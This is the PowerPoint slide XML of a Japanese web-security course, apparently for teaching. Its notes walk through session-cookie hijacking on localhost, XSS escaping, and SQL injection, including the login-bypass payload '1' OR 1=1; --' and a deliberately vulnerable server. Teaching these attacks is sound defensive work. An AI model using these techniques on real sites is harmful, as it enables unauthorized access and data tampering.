              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>で実装しますが、本講座は</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>Python</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>でのプログラミングなので</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>のコードは「こういうもんなんだ」程度に受け取ってください。作成するプログラムはセッションの</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>email</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>が</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>aaa@gmail.com</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>の場合に管理者、それ以外を一般ユーザと表示するサービスです。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24</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13042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グラムとして左上は管理者のセッションを発行してセッションの内容を表示します。右上は一般ユーザのセッションを作成してセッションの内容を表示します。左下は権限を表示するもので、これで権限の変化を確認します。右下は</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>GET</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>で受け取った内容をそのまま表示します。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25</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="952435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ではまず</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>GoogleChrome</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>でローカルホストの</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>user_admin.php</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>にアクセスしてセッションのメールアドレスを</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>aaa@gmail.com</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>にします。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26</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3572167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GET</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>でクッキーの内容を表示します。ここで、「</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>PHPSESSID</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>」がセッションキーになります。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27</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4278029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それではここからは、ブラウザを二つ使います。次に</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>FireFox</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>で一般ユーザのセッションを発行します。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28</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3826309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一般ユーザのセッションを保持している</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>FireFox</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>で権限を確認するページに移ると、当然ですが一般ユーザと表示されます。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29</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="282529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今回学ぶ内容を実際に外部のサイトで行った場合、不正アクセス禁止法、電子契約法、電磁的記録不正作出および供与罪、電子計算機損壊等業務妨害罪、電子計算機使用詐欺罪に問われる可能性がありますので外部サイトでは絶対にしないようにしてください。</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3</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3444782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err="1"/>
              <a:t>FireFox</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>のブラウザ画面を右クリックして調査を選択し、ストレージという名前のメニューからクッキーを選択します。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30</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3750255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その中で、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>を選び、名前が</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>PHPSESSID</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>のところの値に、先ほど</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>GoogleChrome</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>で取得したセッションキーを入れます。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31</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3268243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そして更新をすると一般ユーザから管理者に状態が変化します。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32</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2731280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a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>の対策ですが、スクリプトを実行させないためにタグがそのまま表示されるようにします。そこで先ほどから前回まで使用していた</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>html.escape</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>を使用します。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33</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="554164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実際に先ほどの掲示板サービスの一部を改良します。まずライブラリで</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>を追加します。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34</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4053980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GET</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>でアクセスされたときにデータベースから内容を表示するところで</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>html.escape</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>を用います。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35</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1898965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そして実行して、ブラウザからログインしてアクセスします。今度はページ遷移せず、先ほど打ち込んだ内容がそのまま表示されています。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36</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1357622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この仕組みとしては、タグに使われる文字列を、そのまま表示するために、一部文字列を変換して、ブラウザで表示できるようにしたためです。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37</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2883827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その他の対処方法としては、リクエストに</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>が含まれていてレスポンスにも同じ内容が含まれている場合にページを読み込まない設定や、クッキーの設定で</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>make_response</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>のメソッドからクッキーの設定を</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>HTTPonly</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>にするなどがあります。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38</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="674821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それでは次に</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>インジェクションです。</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>インジェクションは、データベースと連動した</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>アプリケーションなどに対する攻撃手法の一つで、外部から指定するパラメータなどに一部</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>文の断片を混入させて不正な操作を行います。これによって、本来得られないはずのデータを出力されたり、保存されたデータが破壊されたり改ざんされることが有ります。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39</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2591637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それでは今回の講座の内容です。まずは</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>における不正アクセスの被害、今までの講座についての補足、ここからは実際に不正アクセスとして</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>インジェクション、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>、ディレクトリトラバーサル、クリックジャッキングといった</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>系の不正アクセスの代表的な内容を学びます。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4</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16123707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では、この</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>インジェクションによって想定される代表的な被害としては、まず不正ログインで、これはログイン画面で</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>とパスワードを入れる際に、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>に</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>を実行する文字列を入れて不正にログインを行います。次に情報漏洩では、登録画面などで</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>のサブクエリとして</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>文を使用して本来表示されないデータが表示されます。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40</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1335741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情報の改ざんでは、検索フォームなどで検索する文字列の後にセミコロンを付けて、その後に</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>UPDATE</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>文や</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>DELETE</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>文を</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>文として入れることでデータベースを改竄されることが有ります。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41</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1189954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a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>インジェクションはどのように行われているかの仕組みを説明します。</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>では文字列を格納する際にシングルクォーテーションを用いるところや、今まで扱うことはありませんでしたが、ハイフンを二つ使うことでコメントアウト、セミコロンを使うことで</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>文を二つ実行できます。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42</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2541779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これらの仕組みを使うことでできることとして代表的な例がパスワード認証です。第</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>回の認証とセッション管理」ではログインをする際に、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>からパスワードを取り出し、パスワードをハッシュ認証していましたが、もっと単純な手法で、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>文として</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>が一致してパスワードが一致した時に、何らかの情報を取り出すような</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>文を作成すると、条件を満たしたときに格納される配列の長さが</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>でない時にログインできるようにします。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43</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1767898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これを</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>でやるとこのような内容になります。しかし、ここで、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>名に「</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>1’</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>　</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>OR</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>　</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>1=1; --</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>」と打ち込みます。すると、セミコロンでいったん</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>文が終了し、その後がコメントアウトされ、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>文が変化し、パスワードが必要なくなります。そして条件が</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>AND</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>から</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>OR</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>になり片方の条件を満たせばよくなりますが、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>は成り立つため</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>100%</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>条件が一致します。そのためログインに成功します。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44</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2994698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それでは実際に不正ログインをするためのサーバ側のプログラムを作成します。先ほどの</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>のプログラムの一部を書き替えて脆弱性を作ります。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45</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="137062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まずライブラリインポートとデータベース接続、セッションの発行とログイン画面へのリダイレクトのプログラムです。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46</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1617917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次にログイン認証です。</a:t>
            </a:r>
            <a:r>
